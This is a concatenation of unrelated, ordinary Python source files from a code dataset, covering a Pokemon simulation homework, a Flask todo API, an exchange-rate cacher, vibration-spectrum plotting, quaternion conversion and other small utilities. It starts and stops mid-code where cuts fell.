(newLocation, 0)\n'''\n'''\n'''\n'''\n'''\n'''\n\n#Variable Declaration\nrow = int(input(\"Enter the integer number of rows => \"))\nprint(row)\ncol = int(input(\"Enter the integer number of cols => \"))\nprint(col)\nprobability = float(input(\"Enter the probability of finding a pokemon (<= 1.0) => \"))\nprint(probability)\nnumSimulations = int(input(\"Enter the number of simulations to run => \"))\nprint(numSimulations)\nbounds = (row-1, col-1)\ntrainerLoc = (row//2, col//2)\ncount = 0\npokeCaught = 0\ntotalPokeCaught = 0\npokemonCaught = []\n\n#Declares the simulation grid\ncount_grid = []\nfor i in range(row):\n count_grid.append( [0]*col )\n\n#Seeds the random generator\nseed_value = 10*row + col\nrandom.seed(seed_value)\n\n#Appends the grid for each simulation run\nwhile(count maxPkmnSimulation):\n maxPkmnSimulation = pokemonCaught[i]\n maxIndex = i+1\n if(pokemonCaught[i] < minPkmnSimulation):\n minPkmnSimulation = 
pokemonCaught[i]\n            minIndex = i+1\n\n#Finds the max/min pokemon caught on a single space\nmaxPkmnOnSpace = 0\nminPkmnOnSpace = 100\nfor i in range(row):\n    for j in range(col):\n        if(count_grid[i][j] > maxPkmnOnSpace):\n            maxPkmnOnSpace = count_grid[i][j]\n        if(count_grid[i][j] < minPkmnOnSpace):\n            minPkmnOnSpace = count_grid[i][j]\n\n#Final output\nif(pkmnSum == 0):\n    print(\"Total pokemon caught is\", pkmnSum)\n    print(\"Minimum pokemon caught was\", minPkmnSimulation, \"in simulation\", minIndex)\n    print(\"Maximum pokemon caught was\", maxPkmnSimulation, \"in simulation\", maxIndex) \n    print(\"Max number of pokemon caught on a space is\", maxPkmnOnSpace)\n    print(\"Min number of pokemon caught on a space is\", minPkmnOnSpace)\n    \nelse:\n    print(\"Total pokemon caught is\", pkmnSum)\n    print(\"Minimum pokemon caught was\", minPkmnSimulation, \"in simulation\", minIndex)\n    print(\"Maximum pokemon caught was\", maxPkmnSimulation, \"in simulation\", maxIndex)\n    print(\"Max number of pokemon caught on a space is\", maxPkmnOnSpace, \"which was {:.2f}% of all pokemon caught\".format(maxPkmnOnSpace/pkmnSum*100))\n    print(\"Min number of pokemon caught on a space is\", minPkmnOnSpace, \"which was {:.2f}% of all pokemon caught\".format(minPkmnOnSpace/pkmnSum*100))","sub_path":"Homeworks/Homework 5/hw5part2.py","file_name":"hw5part2.py","file_ext":"py","file_size_in_byte":5603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"352203131","text":"#!/usr/bin/env python3\n\nclass PersonException( Exception):\n    def __init__(self,m=\"\"):\n        self.m=m\n        self.n=0\n\nclass Person(object):\n\n    __slots__ = ( '__name', '__ort', \"__alter\")\n\n    def __init__( self):\n        self.__name=\"\"\n        self.__ort=\"\"\n        self.__alter=0\n\n    def __getAlter(self): return self.__alter \n    def __setAlter(self,x): \n        if x <1 or x > 100: \n            raise( PersonException(\"FELER!!!!\"))\n            return\n        self.__alter = x\n    alter=property(__getAlter,__setAlter)\n\n    def ausgeben(self):\n        print()\n\nif __name__ == \"__main__\":\n    \n    try: \n        p=Person()\n        p.alter=7777777\n        p.ausgeben()\n    except PersonException as e:\n        print(\"kkkk\",e.m)\n    except Exception as e:\n        print(\"kkkk\")\n    \n\n","sub_path":"Schulung/python_sas/person.py","file_name":"person.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"66984076","text":"from flask import Flask, jsonify, request\nimport sql_db\n\napp = Flask(__name__)\n\n@app.route('/tasks')\ndef apiShowTasks():\n    list = sql_db.showAll()\n    return jsonify(list)\n\n@app.route('/tasks', methods=['POST'])\ndef apiCreateTasks():\n    if request.headers['Content-Type'] == 'application/json':\n        new_user = request.json\n        name = new_user['todo']\n        if not sql_db.check_name(name):\n            if new_user['urgent']:\n                sql_db.insert_urgent(name)\n            else:\n                sql_db.insert(name)\n            response = jsonify(sql_db.get_name(name))\n        else:\n            response = jsonify({ 'message' : \"Task already exists!\"})\n            response.status_code = 409\n    else:\n        response = jsonify({ 'message': \"Invalid Request\"})\n        response.status_code = 400\n    return response\n\n@app.route('/tasks/<id>')\ndef apiGetTask(id):\n    if 
sql_db.check_id(id):\n        response = jsonify(sql_db.get_id(id))\n    else:\n        response = jsonify({ 'message' : \"Not Found!\"})\n        response.status_code = 404\n    return response\n\n@app.route('/tasks/<id>' , methods=['PUT'])\ndef apiUpdateTask(id):\n    if request.headers['Content-Type'] == 'application/json':\n        new_user = request.json\n        id = new_user['id']\n        if sql_db.check_id(id):\n            sql_db.update(id,new_user['todo'],new_user['urgent'])\n            response = jsonify(sql_db.get_id(id))\n        else:\n            response = jsonify({ 'message' : \"Not Found!\"})\n            response.status_code = 404\n    else:\n        response = jsonify({ 'message': \"Invalid Request\"})\n        response.status_code = 400\n    return response\n\n@app.route('/tasks/<id>' , methods=['DELETE'])\ndef apiDeleteTask(id):\n    if sql_db.check_id(id):\n        sql_db.remove(id)\n        response = jsonify({ 'message' : \"Deleted!\"})\n    else:\n        response = jsonify({ 'message' : \"Not Found!\"})\n        response.status_code = 404\n    return response\n\nif __name__ == '__main__':\n    app.run()","sub_path":"server_app.py","file_name":"server_app.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"378605153","text":"import requests\nimport logging\nimport redis\nfrom time import time\n\nfrom flask import jsonify\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import desc\nfrom sqlalchemy.orm import Session\n\nfrom config.settings import OXR_APIKEY, DEFAULT_BASE, MYSQL_URI, REDIS_HOST, REDIS_PORT, \\\n    REDIS_DB, REDIS_PWD, ROUND_DIGITS\nfrom models.models import ExchangeRate\n\n\n# setting up MySQL connection\nengine = create_engine(MYSQL_URI)\nsession = Session(engine)\n\n\n# setting up Redis connection\nredis_db = redis.StrictRedis(host=REDIS_HOST, port=REDIS_PORT, db=REDIS_DB,\n                             password=REDIS_PWD, decode_responses=True)\n\ndef get_oxr_rate():\n    \"\"\"\n    Calls OXR API to get the current exchange rates\n    :return: dict - API response\n    \"\"\"\n    url = f'https://openexchangerates.org/api/latest.json?app_id={OXR_APIKEY}'\n    r = requests.get(url)\n    return r.json()\n\n\ndef limit_to_currency(currency):\n    \"\"\"\n    Get data for the selected currency from the OXR API\n    :param currency: str. 3-letter code: GBP, EUR.\n    `currency` can't be USD since we are converting from it.\n    :return: dict - exchange rate for specific currency\n    \"\"\"\n    data = get_oxr_rate()\n    exchange_rate = data.pop('rates').get(currency)\n    if not exchange_rate:\n        logging.warning(f'Exchange rate for {DEFAULT_BASE} - {currency} not available in API.')\n    else:\n        rate = {\n            'timestamp': int(time()),\n            'base': data.get('base'),\n            'currency': currency,\n            'rate': exchange_rate\n        }\n        return rate\n\n\ndef calculate_final_amount(rate, original_amount):\n    \"\"\"\n    Calculates the converted amount and updates the rate dict in place.\n    :param rate: dict. Currency rates obtained from OXR API\n    :param original_amount: float - amount in USD which needs to be converted.\n    \"\"\"\n    rate.update(\n        {\n            'original_amount': original_amount,\n            'converted_amount': round(original_amount/rate.get('rate'), ROUND_DIGITS),\n        }\n    )\n\n\ndef save_to_mysql(rate):\n    \"\"\"\n    Saves calculated data to MySQL database\n    :param rate: dict. Exchange rate information\n    \"\"\"\n    er = ExchangeRate(\n        timestamp=rate.get('timestamp'),\n        base='USD',\n        currency=rate.get('currency'),\n        rate=rate.get('rate'),\n        original_amount=rate.get('original_amount'),\n        converted_amount=rate.get('converted_amount'),\n    )\n    session.add(er)\n    session.commit()\n\n\ndef save_to_redis(rate):\n    \"\"\"\n    Saves calculated data to Redis cache\n    :param rate: dict. 
Exchange rate information\n    \"\"\"\n    key = f'{rate.get(\"timestamp\")}-{rate.get(\"currency\")}'\n    redis_db.hmset(key, rate)\n\n\ndef grab_and_save_rate(currency, original_amount):\n    \"\"\"\n    Call OXR API with provided values and save output to MySQL and Redis\n    :param currency: str - 3-letter code: GBP, EUR.\n    `currency` can't be USD since we are converting from it.\n    :param original_amount: float - amount in USD which needs to be converted.\n    \"\"\"\n    rate = limit_to_currency(currency)\n    calculate_final_amount(rate, original_amount)\n    save_to_mysql(rate)\n    save_to_redis(rate)\n\n\ndef get_from_my_sql(n=None, currency=None):\n    \"\"\"\n    Query MySQL to get last operations which match criteria.\n    :param n: int - number of operations\n    :param currency: str - 3-letter code. Currency of exchange\n    :return: list - operations performed.\n    \"\"\"\n    if n is None:\n        n = 1\n    if currency:\n        ms_data = session.query(ExchangeRate).filter(ExchangeRate.currency == currency)\\\n            .order_by(desc(ExchangeRate.timestamp)).limit(n)\n    else:\n        ms_data = session.query(ExchangeRate).order_by(desc(ExchangeRate.timestamp)).limit(n)\n    return [ms.serialize for ms in ms_data]\n\n\ndef get_from_redis(n=None, currency=None):\n    \"\"\"\n    Query Redis to get last operations which match criteria.\n    :param n: int - number of operations\n    :param currency: str - 3-letter code. Currency of exchange\n    :return: list - operations performed.\n    \"\"\"\n    if n is None:\n        n = 1\n    if currency:\n        keys = [k for k in redis_db.keys() if currency in k]\n    else:\n        keys = [k for k in redis_db.keys()]\n    keys.sort(reverse=True)\n    return [redis_db.hgetall(key) for key in keys[:n]]\n\ndef jsonify_data(n=None, currency=None):\n    \"\"\"\n    Return jsonified response to be shown as API response\n    :param n: int - number of operations\n    :param currency: str - 3-letter code. Currency of exchange\n    :return: json\n    \"\"\"\n    validation_error = validate_data(n, currency)\n    if validation_error:\n        return validation_error\n    return jsonify(MYSQL=get_from_my_sql(n, currency),\n                   Redis=get_from_redis(n, currency))\n\n\ndef validate_data(n=None, currency=None):\n    \"\"\"\n    Validates user input to see if we have enough data for it.\n    :param n: int - number of operations\n    :param currency: str - 3-letter code. Currency of exchange\n    :return: json - JSON error message to be shown for user.\n    \"\"\"\n    total_currency_records = 0\n    if currency:\n        total_currency_records = session.query(ExchangeRate).\\\n            filter(ExchangeRate.currency == currency).count()\n    total_records = session.query(ExchangeRate).count()\n    if n and currency and total_currency_records < n:\n        logging.warning(f'Requested last {n} exchanges for {currency}. Data only for '\n                        f'{total_currency_records}'\n                        f' rates present')\n        return jsonify(APIWarning=f'Too large number of exchange rates for {currency}. '\n                       f'Only {total_currency_records} rates present')\n    elif n and total_records < n:\n        logging.warning(f'Requested last {n} exchanges. Data only for {total_records} '\n                        f'rates present')\n        return jsonify(APIWarning=f'Too large number of exchange rates. Only '\n                       f'{total_records} rates present')\n    elif currency and total_currency_records == 0:\n        logging.warning(f'Exchange rates for {currency} were requested. No data in database.')\n        return jsonify(APIWarning=f'There is no exchange rates for {currency} in database')\n    elif total_records == 0:\n        logging.warning('Exchange rates were requested. 
No data in database.')\n return jsonify(APIWarning='There is no exchange rates in database')\n else:\n return {}\n","sub_path":"utils/grab_and_save.py","file_name":"grab_and_save.py","file_ext":"py","file_size_in_byte":6479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"229297928","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n\nimport os\nf_strFileName = os.path.split(__file__)[1]\nf_strFileBaseName = os.path.splitext(f_strFileName)[0]\nf_strAppName = __file__.split(os.path.sep)[-3]\n\nimport asyncio\nimport logging\nlogging.basicConfig(level = logging.INFO, format = '%(message)s \\n\\t %(levelname)s %(pathname)s:%(lineno)d(%(funcName)s)' )\n\nfrom bsn.common import asyncio_app\nfrom bsn.common import app_base as app\nfrom optparse import OptionParser\nfrom optparse import OptionGroup\n\ndef _parse_arg():\n parse = OptionParser()\n group = OptionGroup(parse, \n 'App Options',\n 'app special config')\n\n # group.add_option('-c','--config',\n # metavar='configDir',\n # action='store',\n # dest='config',\n # type=\"string\",\n # default = 'default',\n # help='config dir name')\n\n parse.add_option_group(group)\n return app.get_args(parse)\n\nclass CApp(app.CApp):\n def __init__(self, loop, *args):\n logging.info(\"{} args={}\".format(self, args))\n super().__init__(loop, f_strAppName, *args)\n\ndef create_app(loop, *args):\n logging.info(\"args={}\".format(args))\n return CApp(loop, *args)\n\nif __name__ == '__main__':\n args = _parse_arg()\n logging.info(\"args={}\".format(args))\n asyncio_app.main(create_app, args)","sub_path":"bsn/agent/bin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"632956530","text":"'''\nFile contains utility functions which are used by problem solutions\n'''\n\nimport math\n\ndef prime_factors(number):\n\t'''\n\tReturns a collection of number prime factors\n\t'''\n\t\n\tfactors = []\n\n\tpotential = 2\n\n\twhile number > 1:\n\n\t\twhile (number % potential == 0):\n\t\t\tfactors.append(potential)\n\t\t\tnumber = number / potential\n\n\t\tpotential = potential + 1\n\n\treturn factors\n\ndef prime_generator():\n '''\n Prime number generator\n '''\n \n for prime in [2,3,5,7,11,13,17,19]:\n yield prime\n \n prime = 23\n \n while True:\n dividers = [divider for divider in xrange(2, int(math.sqrt(prime)) + 1)]\n remainders = map(lambda div: prime % div, dividers)\n \n if 0 not in remainders:\n yield prime\n \n prime = prime + 1\n \ndef primes_upto(number):\n\t'''\n\tReturn primes ...\n\t'''\n\n\tprimes = [candidate for candidate in xrange(2, number+1) if len(prime_factors(candidate)) == 1]\n\n\treturn primes\n\n\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"520663228","text":"# coding: utf-8\nimport typing\n\nfrom sqlalchemy import and_\n\nfrom rolling.model.character import CharacterModel\nfrom rolling.server.document.build import BuildDocument\nfrom rolling.server.link import CharacterActionLink\n\nif typing.TYPE_CHECKING:\n from rolling.kernel import Kernel\n\n\nclass BuildLib:\n def __init__(self, kernel: \"Kernel\") -> None:\n self._kernel = kernel\n\n def place_build(\n self,\n world_row_i: int,\n world_col_i: int,\n zone_row_i: int,\n zone_col_i: int,\n build_id: str,\n under_construction: bool = True,\n commit: bool = True,\n ) 
-> BuildDocument:\n        build_doc = BuildDocument(\n            world_row_i=world_row_i,\n            world_col_i=world_col_i,\n            zone_row_i=zone_row_i,\n            zone_col_i=zone_col_i,\n            build_id=build_id,\n            under_construction=under_construction,\n        )\n        self._kernel.server_db_session.add(build_doc)\n\n        if commit:\n            self._kernel.server_db_session.commit()\n\n        return build_doc\n\n    def get_build_doc(self, build_id: int) -> BuildDocument:\n        return (\n            self._kernel.server_db_session.query(BuildDocument)\n            .filter(BuildDocument.id == build_id)\n            .one()\n        )\n\n    def get_on_build_actions(\n        self, character: CharacterModel, build_id: int\n    ) -> typing.List[CharacterActionLink]:\n        build_doc = self.get_build_doc(build_id)\n        actions: typing.List[CharacterActionLink] = []\n\n        for action in self._kernel.action_factory.get_all_with_build_actions():\n            actions.extend(action.get_character_actions(character, build_id=build_id))\n\n        return actions\n\n    def get_zone_build(\n        self,\n        world_row_i: int,\n        world_col_i: int,\n        zone_row_i: typing.Optional[int] = None,\n        zone_col_i: typing.Optional[int] = None,\n    ) -> typing.List[BuildDocument]:\n        filters = [\n            BuildDocument.world_row_i == world_row_i,\n            BuildDocument.world_col_i == world_col_i,\n        ]\n\n        if zone_row_i is not None and zone_col_i is not None:\n            filters.extend(\n                [BuildDocument.zone_row_i == zone_row_i, BuildDocument.zone_col_i == zone_col_i]\n            )\n\n        return self._kernel.server_db_session.query(BuildDocument).filter(and_(*filters)).all()\n\n    def progress_build(\n        self,\n        build_id: int,\n        real_progress_cost: float,\n        consume_resources_percent: float,\n        commit: bool = True,\n    ) -> None:\n        build_doc = self.get_build_doc(build_id)\n        build_description = self._kernel.game.config.builds[build_doc.build_id]\n\n        for required_resource in build_description.build_require_resources:\n            quantity_to_reduce = required_resource.quantity * (consume_resources_percent / 100)\n            self._kernel.resource_lib.reduce_stored_in(\n                build_id,\n                resource_id=required_resource.resource_id,\n                quantity=quantity_to_reduce,\n                commit=False,\n            )\n\n        build_doc.ap_spent = float(build_doc.ap_spent) + real_progress_cost\n\n        if build_doc.ap_spent >= build_description.cost:\n            build_doc.under_construction = False\n\n        self._kernel.server_db_session.add(build_doc)\n\n        if commit:\n            self._kernel.server_db_session.commit()\n","sub_path":"rolling/server/lib/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"217663404","text":"# Just constants for colors and text fx\nclass colors:\n    HEADER = '\\033[95m'\n    OKBLUE = '\\033[94m'\n    OKGREEN = '\\033[92m'\n    WARNING = '\\033[93m'\n    FAIL = '\\033[91m'\n    ENDC = '\\033[0m'\n    BOLD = '\\033[1m'\n    UNDERLINE = '\\033[4m'\n\n    # A test text to test the constants\n    \"\"\"print(colors.WARNING + \"Warning: No active frommets remain. 
Continue?\"\n + colors.ENDC)\"\"\"\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"565824395","text":"from ..operators import *\nfrom .double import SilenceAction\n\n\nclass PlayOnlyPartsIdxs(ChordAction):\n def __init__(self, idxs, **kwargs):\n \"\"\"\n Silence a part\n \"\"\"\n self.idxs = idxs\n\n def action(self, chord: Chord, **kwargs):\n\n new_chord = chord.copy()\n parts = new_chord.parts\n for idx, part in enumerate(parts):\n if idx not in self.idxs:\n new_chord.score[part] = SilenceAction()(new_chord.score[part])\n\n return new_chord","sub_path":"musiclang/script/actions/play_on.py","file_name":"play_on.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"431013348","text":"# pylint: disable=missing-docstring\nimport unittest\n\ndef solve(fn_input):\n lines = fn_input[:-1].split(\"\\n\")\n i = 0\n steps = 0\n lines = list(map(int, lines))\n while i < len(lines):\n j = i\n i += lines[i]\n lines[j] += 1\n steps += 1\n return steps\n\nclass UnitTest(unittest.TestCase):\n def test_solve(self):\n self.assertEqual(solve(\"0\\n3\\n0\\n1\\n-3\\n\"), 5)\n","sub_path":"solvers/day05a.py","file_name":"day05a.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"57901906","text":"#3 filenames\npath = r'/labshare/data/spruce/experiments/2018-02-13_geophone_accelerometer/2018-02-13/'\npath2 = r'/labshare/data/spruce/experiments/2018-02-13_geophone_accelerometer/2018-02-14/'\npath3 = r'/labshare/data/spruce/experiments/2018-02-13_geophone_accelerometer/2018-02-16/'\n\nfn_trustedf = path + '2018-02-13_155025_TwoSpectrum.h5'\nfn_mxcon = path + '2018-02-13_155359_TwoSpectrum.h5'\nfn_mxcoffcomp = path + '2018-02-13_154552_TwoSpectrum.h5'\n\nfn_stillon = path + '2018-02-13_171542_TwoSpectrum.h5'\n\nfn_still_ptoff = path + '2018-02-13_165328_TwoSpectrum.h5'\n\nfn_v_base = path + '2018-02-13_191348_TwoSpectrum.h5'\nfn_v_base_on = path + '2018-02-13_191843_TwoSpectrum.h5'\n\nfn_v_prex = path2 + '2018-02-14_165956_TwoSpectrum.h5'\nfn_v_posx = path2 + '2018-02-14_175027_TwoSpectrum.h5'\nfn_v_bolts = path2 + '2018-02-14_181259_TwoSpectrum.h5'\nfn_v_nfloat = path2 + '2018-02-14_182119_TwoSpectrum.h5'\n\nfn_v_nfloat_on = path2 + '2018-02-14_182708_TwoSpectrum.h5'\nfn_v_float_on = path2 + '2018-02-14_190258_TwoSpectrum.h5'\n\nfn_v_float_off = path2 + '2018-02-14_191818_TwoSpectrum.h5'\n\nfn_lindriveon = path + '2018-02-13_160701_TwoSpectrum.h5'\nfn_lindriveoff = path + '2018-02-13_161633_TwoSpectrum.h5'\n\nfn_recent = path3 + '2018-02-16_193815_TwoSpectrum.h5'\n\nfn_v_lindriveon60hz = path3 + '2018-02-16_190300_TwoSpectrum.h5'\nfn_v_lindriveon75hz = path3 + '2018-02-16_191233_TwoSpectrum.h5'\nfn_v_lindriveoff75hz = path3 + '2018-02-16_192927_TwoSpectrum.h5'\n\n\nfn_vcopen_ptoff = [\n path + '2018-02-13_155025_TwoSpectrum.h5',\n path + '2018-02-13_175339_TwoSpectrum.h5',\n path + '2018-02-13_175955_TwoSpectrum.h5',\n]\n\nfn_vcclosed_ptoff = [\n path + '2018-02-13_181258_TwoSpectrum.h5',\n path + '2018-02-13_181926_TwoSpectrum.h5',\n path + '2018-02-13_183433_TwoSpectrum.h5',\n path + '2018-02-13_191348_TwoSpectrum.h5',\n path2+ '2018-02-14_165956_TwoSpectrum.h5',\n path2+ '2018-02-14_175027_TwoSpectrum.h5',\n path2+ '2018-02-14_181259_TwoSpectrum.h5',\n path2+ 
'2018-02-14_182119_TwoSpectrum.h5',\n path2+ '2018-02-14_191328_TwoSpectrum.h5',\n path2+ '2018-02-14_191818_TwoSpectrum.h5',\n path3+ '2018-02-16_182831_TwoSpectrum.h5',\n]\n\nfn_vcopen_pton = [\n path + '2018-02-13_155359_TwoSpectrum.h5',\n path + '2018-02-13_160056_TwoSpectrum.h5',\n path + '2018-02-13_160701_TwoSpectrum.h5',\n]\n\nfn_vcclosed_pton = [\n path + '2018-02-13_191843_TwoSpectrum.h5',\n #path2+ '2018-02-14_182708_TwoSpectrum.h5',\n #path2+ '2018-02-14_183445_TwoSpectrum.h5',\n #path2+ '2018-02-14_185853_TwoSpectrum.h5',\n path2+ '2018-02-14_190258_TwoSpectrum.h5',\n path2+ '2018-02-14_190841_TwoSpectrum.h5',\n path2+ '2018-02-14_192242_TwoSpectrum.h5',\n path2+ '2018-02-14_192802_TwoSpectrum.h5',\n path3+ '2018-02-16_184504_TwoSpectrum.h5',\n path3+ '2018-02-16_191233_TwoSpectrum.h5',\n]\n\ndef vcopen_pton():\n v = Vibrations()\n ls = []\n ls.append(v.getlsd(fn_vcopen_pton[0], minfreq=.2, vparam='v2'))\n ls.append(v.getlsd(fn_vcopen_pton[1], minfreq=.2, vparam='v2'))\n ls.append(v.getlsd(fn_vcopen_pton[2], minfreq=.2, vparam='v2'))\n fig,ax = plt.subplots()\n for l in ls:\n ax.loglog(l[0], np.sqrt(l[1])/.1024/9.8)\n ax.set_xlabel('Hz')\n ax.set_ylabel('g/sqrt(Hz)')\n return [fig,ax]\n\n\ndef dggcomp(both=True, filename=None):\n v = Vibrations()\n #l1 = v.getlsd(fn_v_float_on, minfreq=.02)\n #l2 = v.getlsd(fn_v_float_off, minfreq=.02)\n l1 = v.getlsd(fn_v_lindriveon75hz, minfreq=.02)\n l2 = v.getlsd(fn_v_base, minfreq=.02)\n fig,ax = plt.subplots(figsize=(5,4))\n if both:\n ax.loglog(l1[0],l1[4]*1e6, label='PT on')\n ax.loglog(l2[0],l2[4]*1e6, label='PT off')\n ax.legend()\n else:\n ax.loglog(l1[0],l1[4]*1e6, label='PT on')\n ax.set_ylim([1e-6,10])\n ax.set_xlim([1,100])\n if filename is not None:\n ax.tick_params(labelbottom='off')\n ax.tick_params(labelleft='off')\n fig.savefig(filename, dpi=600, transparent=True)\n return [fig,ax]\n\ndef dggcomp_2():\n v = Vibrations()\n l1 = v.getlsd(fn_v_lindriveon75hz, minfreq=.05)\n l2 = v.getlsd(fn_v_base, minfreq=.05)\n fig,ax = plt.subplots(figsize=(6/1.5,4/1.5))\n ax.loglog(l1[0],l1[4]*1e6, label='PT on', color='C1')\n ax.loglog(l2[0],l2[4]*1e6, label='PT off',color='C2')\n ax.legend()\n ax.set_ylim([1e-6,10])\n ax.set_xlim([1,100])\n ax.set_xlabel('Frequency (Hz)')\n ax.set_ylabel(r'$\\mu{\\rm m}/\\sqrt{\\rm Hz}$')\n return [fig,ax]\n\n\ndef denhanncomp(filename=None, w=6.55, h=3.65):\n v = Vibrations()\n l1 = v.getlsd(fn_v_lindriveon75hz, minfreq=.1)\n fig,ax = plt.subplots()\n ax.set_xlabel('Frequency (Hz)')\n ax.set_ylabel(r'${\\rm m}^2/{\\rm Hz}$')\n ax.loglog(l1[0], np.square(l1[4]))\n ax.set_ylim([2e-22, 1e-11])\n ax.set_xlim([1,100])\n fig.tight_layout()\n setaxsize(ax, w, h)\n if filename is not None:\n ax.tick_params(labelbottom='off')\n ax.tick_params(labelleft='off')\n fig.savefig(filename, dpi=600, transparent=True)\n return [fig,ax]\n\ndef setaxsize(ax, w,h):\n \"\"\" w, h: width, height in inches \"\"\"\n if not ax: ax=plt.gca()\n l = ax.figure.subplotpars.left\n r = ax.figure.subplotpars.right\n t = ax.figure.subplotpars.top\n b = ax.figure.subplotpars.bottom\n figw = float(w)/(r-l)\n figh = float(h)/(t-b)\n ax.figure.set_size_inches(figw, figh)\n \ndef uqtcomp(w=5,h=1.434):\n v = Vibrations()\n l1 = v.getlsd(fn_vcopen_pton[0], minfreq=.2, vparam='v2')\n fig,ax = plt.subplots()\n ax.loglog(l1[0], np.sqrt(l1[1])/.1024/9.8)\n ax.set_xlabel('Hz')\n ax.set_ylabel('g/sqrt(Hz)')\n ax.set_ylim([1e-7,5e-3])\n ax.set_xlim([1,1000])\n setaxsize(ax, w,h)\n return [fig,ax]\n\ndef blueforscomp(filename=None):\n v = 
Vibrations()\n    l = v.getlsd(fn_v_lindriveon75hz, minfreq=.2, scaling='spectrum')\n    fig,ax = plt.subplots()\n    ax.set_xlabel('Frequency (Hz)')\n    ax.set_ylabel(r'${\rm m}$')\n    ax.loglog(l[0], l[4])\n    ax.set_xlim([1,200])\n    ax.set_ylim([1e-12, 1e-6])\n    fig.tight_layout()\n    if filename is not None:\n        ax.tick_params(labelbottom='off')\n        ax.tick_params(labelleft='off')\n        fig.savefig(filename, dpi=300, transparent=True)\n    return [fig,ax]\n\n\n","sub_path":"2018/02/analyze_geo.py","file_name":"analyze_geo.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"565564398","text":"import os\nimport json\nimport numpy as np\n\ndef rotMat2Quat(poseRotMat):\n    res = []\n\n    for i, mat3x3 in enumerate(poseRotMat):\n        qw = qx = qy = qz = None\n\n        tr = mat3x3[0][0] + mat3x3[1][1] + mat3x3[2][2]\n        if (tr > 0):\n            # print(\"!1!\")\n            S = np.sqrt(tr + 1) *2\n            qw = 0.25*S\n            qx = (mat3x3[2][1] - mat3x3[1][2]) / S\n            qy = (mat3x3[0][2] - mat3x3[2][0]) / S\n            qz = (mat3x3[1][0] - mat3x3[0][1]) / S\n        elif ((mat3x3[0][0] > mat3x3[1][1]) & (mat3x3[0][0] > mat3x3[2][2])):\n            # print(\"!2!\")\n            S = np.sqrt(1 + mat3x3[0][0] - mat3x3[1][1] - mat3x3[2][2]) * 2\n            qw = (mat3x3[2][1] - mat3x3[1][2]) / S\n            qx = 0.25*S\n            qy = (mat3x3[1][0] + mat3x3[0][1]) / S\n            qz = (mat3x3[2][0] + mat3x3[0][2]) / S\n        elif ((mat3x3[1][1] > mat3x3[2][2])):\n            # print(\"!3!\")\n            S = np.sqrt(1 + mat3x3[1][1] - mat3x3[0][0] - mat3x3[2][2]) * 2\n            qw = (mat3x3[0][2] - mat3x3[2][0]) / S\n            qx = (mat3x3[1][0] + mat3x3[0][1]) / S\n            qy = 0.25*S\n            qz = (mat3x3[2][1] + mat3x3[1][2]) / S\n        else:\n            # print(\"!4!\")\n            S = np.sqrt(1 + mat3x3[2][2] - mat3x3[0][0] - mat3x3[1][1]) * 2\n            qw = (mat3x3[1][0] - mat3x3[0][1]) / S\n            qx = (mat3x3[2][0] + mat3x3[0][2]) / S\n            qy = (mat3x3[2][1] + mat3x3[1][2]) / S\n            qz = 0.25*S\n        # negate w and x to convert from the right-handed (RHS) to the left-handed (LHS) coordinate system\n        res.append([-qw, -qx, qy, qz])\n    return res\n\ndef output_pretty(spin_output_path):\n    # prepare spin json for unity\n    # 1. rotation matrix to Quaternion\n    # 2. 
pretty json\n    spin_output = dict()\n    with open(spin_output_path, \"r\") as f:\n        spin_output = json.load(f)\n    res = {\n        \"dataset\": spin_output[\"dataset:\"],\n        \"name\": spin_output[\"name\"],\n        \"betas\": spin_output[\"pred_betas\"][0],\n        \"poses\": None,\n        \"camera_trans\": spin_output[\"camera_translation\"],\n    }\n\n    pose_parms = rotMat2Quat(np.concatenate((spin_output[\"global_orient\"][0], spin_output[\"body_pose\"][0]), axis=0))\n    res[\"poses\"] = pose_parms\n    print(np.array(pose_parms).shape)\n    return res\n\n# img_name = \"000000000785\"\n# path_spin = \"./COCO_2017kpt/{}_output.json\".format(img_name)\n# path_unity = \"./unity_format_data/{}_spin.json\".format(img_name)\n#\n# json_unity = output_pretty(path_spin)\n# with open(path_unity, \"w\") as f:\n#     json.dump(json_unity, f, indent=4)\n","sub_path":"json_spin2unity.py","file_name":"json_spin2unity.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"14097108","text":"import json\nfrom tqdm import tqdm\nimport os\nimport pandas as pd\nfrom data_utils import *\nfrom keras.callbacks import Callback\nfrom model import Graph\nfrom keras_bert import Tokenizer, calc_train_steps\nimport tensorflow as tf\nimport re\nimport keras.backend as K\n\nglobal graph\ngraph = tf.get_default_graph()\n\nmax_len = 200\n\ncategory_nums = 21\nseed = 10\n\ntoken_dict = {}\ndict_path = 'chinese_L-12_H-768_A-12/vocab.txt'\nwith open(dict_path, encoding='utf8') as file:\n    for line in file.readlines():\n        token = line.strip()\n        token_dict[token] = len(token_dict)\n\nadditional_chars = set()\n\n\nclass OurTokenizer(Tokenizer):\n    def 